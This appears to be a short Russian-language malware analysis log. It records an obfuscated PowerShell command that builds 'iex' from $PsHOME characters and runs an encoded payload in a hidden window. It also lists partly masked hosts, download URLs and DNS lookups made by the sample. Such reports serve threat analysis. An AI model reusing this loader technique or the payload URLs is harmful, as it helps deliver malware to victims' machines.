Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ( $PsHOMe[4]+$pShOme[34]+'x')( ( '14s72%123A108,23t68%79A93_7f69A72%64,79,73_94z10X100u79A94,4t125u79s72%105t70A67f79t68t94f17,14u78,105_71%23,13A66s94t94X90z16t5A5X93,93f93,4f78A67_68X75_76u...
- 'di###iler.se':80
- 'at##expo.vn':80
- 'at##expo.vn':443
- 'sa###x.com.br':80
- http://www.di###iler.se/0mG1fU7ud/
- http://www.at##expo.vn/Messages-2018/f7fc54gDI/
- http://www.sa###x.com.br/6k7mXEEF/
- 'at##expo.vn':443
- DNS ASK di###iler.se
- DNS ASK at##expo.vn
- DNS ASK an####awellness.com
- DNS ASK sa###x.com.br
- DNS ASK ge###chairs.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ( $PsHOMe[4]+$pShOme[34]+'x')( ( '14s72%123A108,23t68%79A93_7f69A72%64,79,73_94z10X100u79A94,4t125u79s72%105t70A67f79t68t94f17,14u78,105_71%23,13A66s94t94X90z16t5A5X93,93f93,4f78A67_68X75_76u...' (со скрытым окном)